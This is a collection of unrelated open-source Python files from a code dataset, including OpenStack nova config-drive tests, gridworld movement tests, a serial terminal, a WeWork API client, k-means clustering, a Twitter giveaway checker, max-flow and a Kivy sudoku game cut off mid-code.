fakes.stub_instance_obj(ctxt=None, id=2)])\n req = fakes.HTTPRequest.blank(self.base_url + 'detail')\n res = req.get_response(self.app)\n server_dicts = jsonutils.loads(res.body)['servers']\n self.assertNotEqual(len(server_dicts), 0)\n for server_dict in server_dicts:\n self.assertIn('config_drive', server_dict)\n\n\nclass ConfigDriveTestV2(ConfigDriveTestV21):\n def _setup_wsgi(self):\n self.flags(\n osapi_compute_extension=[\n 'nova.api.openstack.compute.contrib.select_extensions'],\n osapi_compute_ext_list=['Config_drive'])\n self.app = fakes.wsgi_app(init_only=('servers',))\n\n\nclass ServersControllerCreateTestV21(test.TestCase):\n base_url = '/v2/fake/'\n bad_request = exception.ValidationError\n\n def _set_up_controller(self):\n ext_info = extension_info.LoadedExtensionInfo()\n self.controller = servers_v21.ServersController(\n extension_info=ext_info)\n CONF.set_override('extensions_blacklist',\n 'os-config-drive',\n 'osapi_v21')\n self.no_config_drive_controller = servers_v21.ServersController(\n extension_info=ext_info)\n\n def _verfiy_config_drive(self, **kwargs):\n self.assertNotIn('config_drive', kwargs)\n\n def _initialize_extension(self):\n pass\n\n def setUp(self):\n \"\"\"Shared implementation for tests below that create instance.\"\"\"\n super(ServersControllerCreateTestV21, self).setUp()\n\n self.instance_cache_num = 0\n self._set_up_controller()\n\n def instance_create(context, inst):\n inst_type = flavors.get_flavor_by_flavor_id(3)\n image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'\n def_image_ref = 'http://localhost/images/%s' % image_uuid\n self.instance_cache_num += 1\n instance = fake_instance.fake_db_instance(**{\n 'id': self.instance_cache_num,\n 'display_name': inst['display_name'] or 'test',\n 'uuid': fakes.FAKE_UUID,\n 'instance_type': inst_type,\n 'access_ip_v4': '1.2.3.4',\n 'access_ip_v6': 'fead::1234',\n 'image_ref': inst.get('image_ref', def_image_ref),\n 'user_id': 'fake',\n 'project_id': 'fake',\n 'reservation_id': inst['reservation_id'],\n \"created_at\": datetime.datetime(2010, 10, 10, 12, 0, 0),\n \"updated_at\": datetime.datetime(2010, 11, 11, 11, 0, 0),\n \"progress\": 0,\n \"fixed_ips\": [],\n \"task_state\": \"\",\n \"vm_state\": \"\",\n \"root_device_name\": inst.get('root_device_name', 'vda'),\n })\n\n return instance\n\n fake.stub_out_image_service(self)\n self.stub_out('nova.db.instance_create', instance_create)\n\n def _test_create_extra(self, params, override_controller):\n image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'\n server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)\n server.update(params)\n body = dict(server=server)\n req = fakes.HTTPRequest.blank(self.base_url + 'servers')\n req.method = 'POST'\n req.body = jsonutils.dump_as_bytes(body)\n req.headers[\"content-type\"] = \"application/json\"\n if override_controller is not None:\n server = override_controller.create(req, body=body).obj['server']\n else:\n server = self.controller.create(req, body=body).obj['server']\n\n def test_create_instance_with_config_drive_disabled(self):\n params = {'config_drive': \"False\"}\n old_create = compute_api.API.create\n\n def create(*args, **kwargs):\n self._verfiy_config_drive(**kwargs)\n return old_create(*args, **kwargs)\n\n self.stubs.Set(compute_api.API, 'create', create)\n self._test_create_extra(params,\n override_controller=self.no_config_drive_controller)\n\n def _create_instance_body_of_config_drive(self, param):\n self._initialize_extension()\n\n def create(*args, **kwargs):\n self.assertIn('config_drive', kwargs)\n return old_create(*args, **kwargs)\n\n old_create = compute_api.API.create\n self.stubs.Set(compute_api.API, 'create', create)\n image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'\n flavor_ref = ('http://localhost' + self.base_url + 'flavors/3')\n body = {\n 'server': {\n 'name': 'config_drive_test',\n 'imageRef': image_href,\n 'flavorRef': flavor_ref,\n 'config_drive': param,\n },\n }\n\n req = fakes.HTTPRequest.blank(self.base_url + 'servers')\n req.method = 'POST'\n req.body = jsonutils.dump_as_bytes(body)\n req.headers[\"content-type\"] = \"application/json\"\n\n return req, body\n\n def test_create_instance_with_config_drive(self):\n param = True\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_config_drive_as_boolean_string(self):\n param = 'false'\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_bad_config_drive(self):\n param = 12345\n req, body = self._create_instance_body_of_config_drive(param)\n self.assertRaises(self.bad_request,\n self.controller.create, req, body=body)\n\n def test_create_instance_without_config_drive(self):\n param = True\n req, body = self._create_instance_body_of_config_drive(param)\n del body['server']['config_drive']\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_empty_config_drive(self):\n param = ''\n req, body = self._create_instance_body_of_config_drive(param)\n self.assertRaises(exception.ValidationError,\n self.controller.create, req, body=body)\n\n\nclass ServersControllerCreateTestV2(ServersControllerCreateTestV21):\n bad_request = webob.exc.HTTPBadRequest\n\n def _set_up_controller(self):\n self.ext_mgr = extensions.ExtensionManager()\n self.ext_mgr.extensions = {}\n self.controller = servers_v2.Controller(self.ext_mgr)\n self.no_config_drive_controller = None\n\n def _verfiy_config_drive(self, **kwargs):\n self.assertIsNone(kwargs['config_drive'])\n\n def _initialize_extension(self):\n self.ext_mgr.extensions = {'os-config-drive': 'fake'}\n\n def test_create_instance_with_empty_config_drive(self):\n param = ''\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/tests/unit/api/openstack/compute/test_config_drive.py","file_name":"test_config_drive.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"70900972626","text":"import pytest\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.envs.utils import get_next_position\nfrom gym_gridverse.geometry import Orientation, Position\n\n\n@pytest.mark.parametrize(\n 'position',\n [\n Position(-5, -5),\n Position(-5, 0),\n Position(-5, 5),\n Position(0, -5),\n Position(0, 0),\n Position(0, 5),\n Position(5, -5),\n Position(5, 0),\n Position(5, 5),\n ],\n)\n@pytest.mark.parametrize('orientation', list(Orientation))\n@pytest.mark.parametrize(\n 'action',\n [\n Action.TURN_LEFT,\n Action.TURN_RIGHT,\n Action.ACTUATE,\n Action.PICK_N_DROP,\n ],\n)\ndef test_non_movement_actions(\n position: Position, orientation: Orientation, action: Action\n):\n \"\"\"Any action that does not 'move' should not affect next position\"\"\"\n assert get_next_position(position, orientation, action) == position\n\n\n@pytest.mark.parametrize(\n 'position,orientation,action,expected',\n [\n (\n Position(3, 6),\n Orientation.F,\n Action.MOVE_FORWARD,\n Position(2, 6),\n ),\n (\n Position(5, 2),\n Orientation.B,\n Action.MOVE_FORWARD,\n Position(6, 2),\n ),\n (\n Position(1, 2),\n Orientation.L,\n Action.MOVE_BACKWARD,\n Position(1, 3),\n ),\n (Position(4, 1), Orientation.R, Action.MOVE_LEFT, Position(3, 1)),\n # off grid\n (\n Position(0, 1),\n Orientation.B,\n Action.MOVE_BACKWARD,\n Position(-1, 1),\n ),\n (\n Position(4, 0),\n Orientation.F,\n Action.MOVE_LEFT,\n Position(4, -1),\n ),\n ],\n)\ndef test_basic_moves(\n position: Position,\n orientation: Orientation,\n action: Action,\n expected: Position,\n):\n assert get_next_position(position, orientation, action) == expected\n","repo_name":"abaisero/gym-gridverse","sub_path":"tests/envs/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"29526005996","text":"import serial\n# import os\nimport threading\nimport serial.tools.list_ports\nfrom time import sleep\n\n\ndef rcv_data():\n while True:\n rc = serial.readline()\n rcv = rc.decode()\n print(rcv)\n\n\nif __name__ == '__main__':\n serialName = \"/dev/ttyS0\"\n # print(serialName)\n serial = serial.Serial(serialName, 115200, timeout=3600)\n th = threading.Thread(target=rcv_data)\n th.setDaemon(True)\n th.start()\n if serial.isOpen():\n print(\"open succeed >\", serial.name)\n else:\n print(\"open failed >\", serial.name)\n while True:\n send_data = input(\"=>\")\n send_data = send_data + '\\r\\n'\n serial.write(send_data.encode())\n data = serial.read(1)\n sleep(0.1)\n data = (data + serial.read(serial.inWaiting())).decode()\n print(data)\n","repo_name":"chenyuyuan/nest-bs","sub_path":"hardware/archieve/main_old0.py","file_name":"main_old0.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8515626643","text":"import requests\nfrom jsonpath import jsonpath\n\nfrom projects.test_requests.test_wework.api.wework import WeWork\nfrom projects.test_requests.test_wework.utils.common_tools import load_yaml\n\n\"\"\"\n使用原生requests做API!! \nclass Department(WeWork):\n\n _secret = 'xxx'\n _create_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/create'\n _query_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/list'\n _update_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/update'\n _delete_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/delete'\n\n def __init__(self): \n self._token = self.get_token(self._secret)\n\n def create_depart(self, name, parent_id=1, **kwargs):\n data = {'name': name, 'parentid': parent_id}\n data.update(kwargs)\n r = requests.post(self._create_url, json=data, params={'access_token': self._token})\n return r.json()\n\n def query_depart(self, **kwargs):\n params = {'access_token': self._token}\n params.update(kwargs)\n r = requests.get(self._query_url, params=params)\n return r.json()\n\n def update_depart(self, ids, **kwargs):\n data = {'id': ids}\n data.update(kwargs)\n r = requests.post(self._update_url, json=data, params={'access_token': self._token})\n return r.json()\n\n def delete_depart(self, ids):\n params = {'access_token': self._token, 'id': ids}\n r = requests.get(self._delete_url, params=params)\n return r.json()\n\n def clear_env(self, data):\n for item in data:\n res = self.query_depart()\n val = jsonpath(res, f'$..department[?(@.name==\"{item}\")]')\n if val:\n ids = val[0]['id']\n self.delete_depart(ids)\n\n\"\"\"\n\n\n# 测试步骤数据驱动\n\nclass Department(WeWork):\n \"\"\"department management: crud\"\"\"\n\n def __init__(self):\n self._data = load_yaml('test_department.api')\n self._token = self.get_token(self._data.get('secret'))\n\n def create_depart(self, name, parent_id=1):\n kwargs = dict(\n params={'access_token': self._token},\n json={'name': name, 'parentid': parent_id}\n )\n r = self.send_request(self._data, 'create_depart', **kwargs)\n return r\n\n def query_depart(self):\n kwargs = dict(\n params={'access_token': self._token}\n )\n r = self.send_request(self._data, 'query_depart', **kwargs)\n return r\n\n def update_depart(self, ids, **kwargs):\n data = {'id': ids}\n data.update(kwargs)\n kwargs = dict(\n params={'access_token': self._token},\n json=data\n )\n r = self.send_request(self._data, 'update_depart', **kwargs)\n return r\n\n def delete_depart(self, ids):\n kwargs = dict(\n params={'access_token': self._token, 'id': ids}\n )\n r = self.send_request(self._data, 'delete_depart', **kwargs)\n return r\n\n def clear_env(self, data):\n for item in data:\n res = self.query_depart()\n val = jsonpath(res, f'$..department[?(@.name==\"{item}\")]')\n if val:\n ids = val[0]['id']\n self.delete_depart(ids)\n\n\n\n\n\n\n","repo_name":"emuyi/test-dev-skills","sub_path":"projects/test_requests/test_wework/api/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"385502310","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n# K-means clustering\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset \ndataset = pd.read_csv('Mall_Customers.csv')\nX = dataset.iloc[:,[3,4]].values\n\n# Using the elbow method to find the optimal # of clusters\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1,11):\n clustering = KMeans(n_clusters=i, init = 'k-means++', max_iter = 300, n_init = 10, random_state=0)\n clustering.fit(X)\n wcss.append(clustering.inertia_)\n\nplt.figure()\nplt.plot(range(1,11),wcss)\nplt.title('The Elbow method')\nplt.xlabel('# of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n# Applying k-means to the dataset with optimal # of clusters\nclustering = KMeans(n_clusters=5, init = 'k-means++', max_iter = 300, n_init = 10, random_state=0)\nY_pred = clustering.fit_predict(X)\n\n# Visualizing the clusters\nplt.figure()\nplt.scatter(X[Y_pred == 0, 0], X[Y_pred == 0, 1], s = 10, c = 'red', label = 'Stingy')\nplt.scatter(X[Y_pred == 1, 0], X[Y_pred == 1, 1], s = 10, c = 'blue', label = 'Standard')\nplt.scatter(X[Y_pred == 2, 0], X[Y_pred == 2, 1], s = 10, c = 'green', label = 'Target')\nplt.scatter(X[Y_pred == 3, 0], X[Y_pred == 3, 1], s = 10, c = 'cyan', label = 'Careless')\nplt.scatter(X[Y_pred == 4, 0], X[Y_pred == 4, 1], s = 10, c = 'magenta', label = 'Sensible')\nplt.scatter(clustering.cluster_centers_[:,0], clustering.cluster_centers_[:,1], s = 30, c='black', label = 'Centroids')\nplt.title('Clusters of clients')\nplt.xlabel('Annual income (K$)')\nplt.ylabel('Spending score (1-100)')\nplt.legend()\nplt.show()","repo_name":"arun-nemani/Machine-learning-projects","sub_path":"Clustering/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27324319156","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 13 12:01:48 2023\n\n@author: Cristobal\n\"\"\"\nimport proxop as pr\nfrom prelim import P_cdom_star,P_cdom_persp,f_star,f_persp,prox_f_star,bounds\nfrom scipy.optimize import root_scalar\n#%%\ndef f_persp_prox(x,eta,Gamma,M,sigma,\n zero_tol = 10**(-16),\n alg = \"brentq\"):\n \n if Gamma < 0.0:\n raise ValueError(\n \"'gamma' in prox_{gamma * e^*} \"\n + \"must be greater or equal than 0\"\n )\n if Gamma < zero_tol:\n P = P_cdom_persp(x, eta)\n return f_persp(P[0],P[1])\n P = P_cdom_star(x/Gamma)\n l = eta + Gamma * f_star(P)\n phi = lambda nu : nu - eta - Gamma*f_star(prox_f_star(x/Gamma,\n nu/Gamma,\n zero_tol))\n \n #Sign check for the eta + Gamma *f_star(P_cdom_star(x/Gamma))\n if l < zero_tol:\n return 0.0\n else:\n #Projection onto closure is in the domain\n if x >= 0 :\n nu_u = l\n nu_d = 0\n if abs(phi(nu_u)) < zero_tol:\n nu_star = nu_u\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n if abs(phi(nu_d)) < zero_tol:\n nu_star = nu_u\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n #Projection onto closure is not in the domain \n else: \n bound = bounds(phi, M, sigma, zero_tol)\n if bound[2] == -1:\n nu_star = bound[0]\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n else:\n nu_d = bound[0]\n nu_u = bound[1]\n #Root Finding algorithm check\n if alg == \"newton\":\n nu_star = root_scalar(phi,\n x0 = M,\n method = alg).root\n if alg == \"secant\":\n nu_star = root_scalar(phi,\n x0 = M,\n x1 = M/sigma,\n method = alg).root\n else:\n nu_star = root_scalar(phi,\n bracket = [nu_d,nu_u],\n method = alg).root\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star, gamma=Gamma/nu_star))\n","repo_name":"Khris-VI/projection_epi","sub_path":"projection_epi/f_persp_prox.py","file_name":"f_persp_prox.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4883940887","text":"#Result: 100/100\n#Solved: 0:37:25\nfrom collections import defaultdict\nfor tc in range(int(input())):\n n = int(input())\n arr = [int(x) for x in input().split()]\n \n d = defaultdict(list)\n \n for i, x in enumerate(arr):\n d[x].append(i+1)\n ans = 0\n \n for k, v in d.items():\n ans += abs(v[-1] - v[0])\n print(ans) ","repo_name":"marcosD67/HackerEarth","sub_path":"DecemberCircuits/occurrences.py","file_name":"occurrences.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16061098081","text":"import tweepy\nimport time\nimport logging\nimport utils\n\n#remove this and use your own keyz\nimport keys\n\n# KEYS\nclient_id = keys.client_id\nclient_secret = keys.client_secret\napi_key = keys.api_key\napi_key_secret = keys.api_key_secret\nbearer_token = keys.bearer_token\napi_token = keys.api_token\napi_token_secret = keys.api_token_secret\n\n#SETUP ENDPOINT\nauth = tweepy.OAuthHandler(api_key, api_key_secret, \"oop\")\napi = tweepy.API(auth)\nauth.set_access_token(api_token, api_token_secret) \nclient = tweepy.Client(bearer_token=bearer_token)\n\n# PARAMETERS\nsleep_time = 60\napi_cool_down = 60*15\n\n# check if name_2 follows name_1, requires screen_names\ndef isFollowedBy(sn_1, sn_2):\n return api.get_friendship(source_screen_name=sn_1,target_screen_name=sn_2)[1].following\n\ndef checkIfFollows(screen_name, list):\n for name in list:\n if not isFollowedBy(name, screen_name):\n return False\n return True\n\ndef checkTags(screen_name, tags):\n if len(tags) < utils.number_of_tags: #respect the requirment\n return False\n\n for tag in tags:\n try:\n #check if tag exist\n api.get_user(screen_name=tag)\n except tweepy.errors.NotFound:\n logging.error(\"Tagged user don't exist!\")\n return False\n #check if tag follows screen_name \n if not isFollowedBy(screen_name, tags) :\n return False\n \n return True\n\ndef getRepliesToTweet(tweets, tweet_id):\n replies = []\n while True:\n try:\n tweet = tweets.next()\n if(tweet.in_reply_to_status_id == tweet_id ):\n replies.append(tweet)\n except tweepy.errors.TooManyRequests as e:\n logging.error(\"Twitter api rate limit reached:{}\".format(e))\n utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n time.sleep(60)\n except tweepy.errors.TweepyException as e:\n logging.error(\"Tweepy error occured:{}\".format(e))\n utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n break\n except StopIteration:\n break\n except Exception as e:\n logging.error(\"Failed while fetching replies {}\".format(e))\n utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n break\n return replies\n\ndef getValidReplies(replies, candidates):\n result_dict = {}\n for tweet in replies:\n data = [ tweet.author.screen_name ]\n if not checkIfFollows(data[0], utils.to_follow) :\n print(data[0]+\" dont follows the required user/users\")\n continue\n if not utils.checkIfLikes(data[0], utils.tweet_id):\n print(data[0]+\" dont liked the required tweet/tweets\")\n continue \n if data[0] in candidates and data[0] not in dict.keys():\n try:\n tmp = tweet.text.split(\" \", 1) #remove @mention\n tmp = tmp[1].split(\"#\", 1) #get discord name\n discord_name = tmp[0]+\"#\" #save it\n tmp = tmp[1].split(\" \") #get discord number\n discord_name += tmp[0] #save it\n data.append(discord_name)\n data.append(tmp[1]) # wallet addr\n if not checkTags( tmp[2:2+utils.number_of_tags] ) :\n continue\n except IndexError:\n logging.error(\"Tweet format not correct\")\n logging.error(tweet.text)\n continue\n result_dict[data[0]] = data[1:3]\n \n return result_dict\n\ndef getReplies(candidates, _screen_name, tweet_id, key_word):\n query = 'to:{} {}'.format(_screen_name, key_word)\n\n tweets = tweepy.Cursor(api.search_tweets, until=utils.giveaway_end, since_id=tweet_id, count=200, q=query).items()\n \n replies = getRepliesToTweet(tweets, tweet_id)\n \n candidates = getValidReplies(replies, candidates)\n \n print( \"There are \" + str( len( candidates ) ) + \" candidates!\" )\n\n utils.writeDict(utils.candidates_file_name, candidates)\n\ndef iterTweetsInfo(func, id, l, next_page):\n while True:\n try:\n print(\"iterating...\")\n page = func(id=id,pagination_token=next_page)\n \n except tweepy.errors.TooManyRequests as e:\n logging.error(\"Twitter api rate limit reached: {}\".format(e))\n time.sleep(60*15)\n \n else: \n if 'next_token' not in page[3].keys():\n return l\n\n for user in page[0]:\n l.append(user.username)\n\n return iterTweetsInfo(func, id, l, page[3]['next_token'])\n\ndef getTweetsInfo(func, tweet_id, file_name):\n result = []\n\n while True:\n try:\n page = func(id=tweet_id)\n\n except tweepy.errors.TooManyRequests as e:\n logging.error(\"Twitter api rate limit reached:{}\".format(e))\n utils.writeFile(\"bkp_\"+file_name, result)\n time.sleep(60*15)\n \n else:\n result = [ u.username for u in page[0] ] \n\n return utils.writeFile(file_name, iterTweetsInfo(func, tweet_id, result, page[3]['next_token']))\n ","repo_name":"bonomip/tgb","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"197907231","text":"import random\nmark_list = [\"abc\"]\nif len(mark_list) == 1:\n ran_list = mark_list\nelse:\n ran_list = random.sample(mark_list, 2)\nfor i in ran_list: \n print(i)\n\n \nb = [12,1,3]\ndef a(ran_switch, ran_no, *args):\n if isinstance(args[0], list) == True:\n args = args[0]\n else:\n args = args\n # decide run_list\n if ran_switch == \"Y\":\n if len(args) == 1:\n run_list = random.sample(args, 1)\n else:\n run_list = random.sample(args, ran_no)\n else:\n run_list = args \n ran_no = 1\n for i in run_list:\n print(i)\ndf = a('Y', 2, b) \n\n\n\n\"\"\"\na = 'QW'\nprint(isinstance(a,int))\n\"\"\"","repo_name":"mingje/Qsync_test2","sub_path":"random_test.sikuli/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8183704705","text":"\nimport vtk\nfrom vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\n\nclass VTK_Test(object):\n\n def setupUI(self, vtkWidget):\n\n\n self.ren = vtk.vtkRenderer()\n vtkWidget.GetRenderWindow().AddRenderer(self.ren)\n self.iren = vtkWidget.GetRenderWindow().GetInteractor()\n\n # Create source\n source = vtk.vtkSphereSource()\n source.SetCenter(0, 0, 0)\n source.SetRadius(50.0)\n\n # Create a mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(source.GetOutputPort())\n\n # Create an actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n self.ren.AddActor(actor)\n\n self.ren.ResetCamera()\n\n self.iren.Initialize()\n","repo_name":"nilsgehlin/team-dft","sub_path":"UI/VTK_integration_demo/vtk_test.py","file_name":"vtk_test.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1387901214","text":"#6086\n# MAX Flow\n# Edmond Karp\n\nimport sys\n\ninput = sys.stdin.readline\n\n\ndef CtoI(target):\n if target.isupper():\n return ord(target) - ord('A')\n else:\n return ord(target) - ord('a') + 26\n\n\nfrom collections import deque\n\nINF = int(1e9)\nMAX = 53\n\nresult = 0\ncapacity = [[0] * MAX for _ in range(MAX)]\nflow = [[0] * MAX for _ in range(MAX)]\ngraph = [[] for _ in range(MAX)]\ndistance = [-1] * MAX\n\n\ndef maxFlow(start, end):\n result = 0\n # print(start,end)\n while True:\n for i in range(MAX): distance[i] = -1\n q = deque()\n q.append(start)\n while q and distance[end] == -1:\n now = q.popleft()\n for will in graph[now]:\n if capacity[now][will] - flow[now][will] > 0 and distance[will] == -1:\n q.append(will)\n distance[will] = now\n # print(will , distance[will])\n if will == end: break\n # print(distance)\n\n if distance[end] == -1: break\n minflow = INF\n\n i = end\n while i != start:\n minflow = min(minflow, capacity[distance[i]][i] - flow[distance[i]][i])\n i = distance[i]\n\n i = end\n while i != start:\n flow[distance[i]][i] += minflow\n flow[i][distance[i]] -= minflow\n i = distance[i]\n result += minflow\n\n return result\n\n\nn = int(input())\nfor i in range(n):\n a, b, c = list(input().split())\n a = CtoI(a)\n b = CtoI(b)\n graph[a].append(b)\n graph[b].append(a)\n capacity[a][b] += int(c)\n capacity[b][a] += int(c)\n\nprint(maxFlow(CtoI('A'), CtoI('Z')))\n\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/6086/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69922703505","text":"from kivy.app import App\nfrom kivy.config import Config\nfrom kivy.core.window import Window\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.popup import Popup\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import Screen, ScreenManager, WipeTransition\n\nfrom datetime import datetime\nimport sqlite3\nimport os\n\nConfig.set('graphics', 'resizable', False)\nsm = ScreenManager()\n\ncell_color_default = (0, 0, 0, 1)\n\ncell_background_default = (1, 1, 1, 1)\ncell_background_accent = (0.93, 0.93, 0.93, 1)\ncell_background_selected = (1, 0.8, 0.8, 1)\ncell_background_generated = (0.83, 0.83, 0.83, 1)\n\ndb_uri = 'scores.db'\n\n\n# másodpercek megjelenítése mm:ss formátumban\ndef seconds2str(seconds: int) -> str:\n return str(seconds // 60).zfill(2) + ':' + str(seconds % 60).zfill(2)\n\n\ndef open_db():\n if os.path.isfile(db_uri):\n try:\n conn = sqlite3.connect(db_uri)\n except sqlite3.Error:\n print('Adatbázis hiba!')\n return False\n cur = conn.cursor()\n\n cmd = 'CREATE TABLE IF NOT EXISTS scores(date DATETIME PRIMARY KEY, name VARCHAR(20), seconds INTEGER)'\n cur.execute(cmd)\n\n return [conn, cur]\n return False\n\n\nclass MenuScreen(Screen):\n def __init__(self, **kwargs):\n super(MenuScreen, self).__init__(**kwargs)\n\n @staticmethod\n def new_game():\n sm.current = 'Game'\n\n @staticmethod\n def rules():\n sm.current = 'Rules'\n\n @staticmethod\n def scoreboard():\n sm.current = 'Scoreboard'\n\n @staticmethod\n def exit_game():\n App.get_running_app().stop()\n\n\nclass GameScreen(Screen):\n def __init__(self, **kwargs):\n super(GameScreen, self).__init__(**kwargs)\n self._keyboard = None\n self.game_started = False\n self.seconds = 0\n self.board = []\n self.cells = []\n self.selection = None\n self.clockEvent = None\n\n def build(self):\n self.new_game()\n\n def _on_enter(self):\n self.new_game()\n self._keyboard = Window.request_keyboard(self._keyboard_closed(), self)\n self._keyboard.bind(on_key_down=self._keyboard_press)\n\n def _on_leave(self):\n self._keyboard_closed()\n\n def _clock_callback(self, dt):\n self.seconds += 1\n self.timer.text = seconds2str(self.seconds)\n\n def _keyboard_closed(self):\n if self._keyboard:\n self._keyboard.unbind(on_key_down=self._keyboard_press)\n self._keyboard = None\n\n def _keyboard_press(self, keyboard, keycode, text, modifiers):\n if self.selection:\n if keycode[1] == '1' or keycode[1] == 'numpad1':\n self.board[self.selection[0]][self.selection[1]] = 1\n elif keycode[1] == '2' or keycode[1] == 'numpad2':\n self.board[self.selection[0]][self.selection[1]] = 2\n elif keycode[1] == '3' or keycode[1] == 'numpad3':\n self.board[self.selection[0]][self.selection[1]] = 3\n elif keycode[1] == '4' or keycode[1] == 'numpad4':\n self.board[self.selection[0]][self.selection[1]] = 4\n elif keycode[1] == '5' or keycode[1] == 'numpad5':\n self.board[self.selection[0]][self.selection[1]] = 5\n elif keycode[1] == '6' or keycode[1] == 'numpad6':\n self.board[self.selection[0]][self.selection[1]] = 6\n elif keycode[1] == '7' or keycode[1] == 'numpad7':\n self.board[self.selection[0]][self.selection[1]] = 7\n elif keycode[1] == '8' or keycode[1] == 'numpad8':\n self.board[self.selection[0]][self.selection[1]] = 8\n elif keycode[1] == '9' or keycode[1] == 'numpad9':\n self.board[self.selection[0]][self.selection[1]] = 9\n elif keycode[1] == 'delete' or keycode[1] == 'backspace':\n self.board[self.selection[0]][self.selection[1]] = 0\n elif keycode[1] == 'left':\n row = self.selection[0]\n if self.selection[1] > 0:\n for col in range(self.selection[1] - 1, -1, -1):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'right':\n row = self.selection[0]\n if self.selection[1] < 9:\n for col in range(self.selection[1] + 1, 9):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'up':\n col = self.selection[1]\n if self.selection[0] > 0:\n for row in range(self.selection[0] - 1, -1, -1):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'down':\n col = self.selection[1]\n if self.selection[0] < 9:\n for row in range(self.selection[0] + 1, 9):\n if self.cells[row][col].select():\n break\n self.update_grid()\n if self.check_board():\n self.win()\n\n def start_timer(self):\n if self.clockEvent:\n self.clockEvent.cancel()\n self.clockEvent = Clock.schedule_interval(self._clock_callback, 1)\n\n def init_board(self):\n self.board.clear()\n for i in range(9):\n self.board.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n self.generate_puzzle()\n\n def new_game(self):\n self.init_board()\n self.create_cells()\n self.seconds = 0\n self.timer.text = seconds2str(self.seconds)\n self.start_timer()\n self.game_started = True\n\n def generate_puzzle(self):\n base = 3\n side = base * base\n\n # pattern for a baseline valid solution\n def pattern(r, c):\n return (base * (r % base) + r // base + c) % side\n\n # randomize rows, columns and numbers (of valid base pattern)\n from random import sample\n\n def shuffle(s):\n return sample(s, len(s))\n\n r_base = range(base)\n rows = [g * base + r for g in shuffle(r_base) for r in shuffle(r_base)]\n cols = [g * base + c for g in shuffle(r_base) for c in shuffle(r_base)]\n nums = shuffle(range(1, base * base + 1))\n\n # produce board using randomized baseline pattern\n self.board = [[nums[pattern(r, c)] for c in cols] for r in rows]\n\n squares = side * side\n empties = squares * 3 // 4\n for p in sample(range(squares), empties):\n # 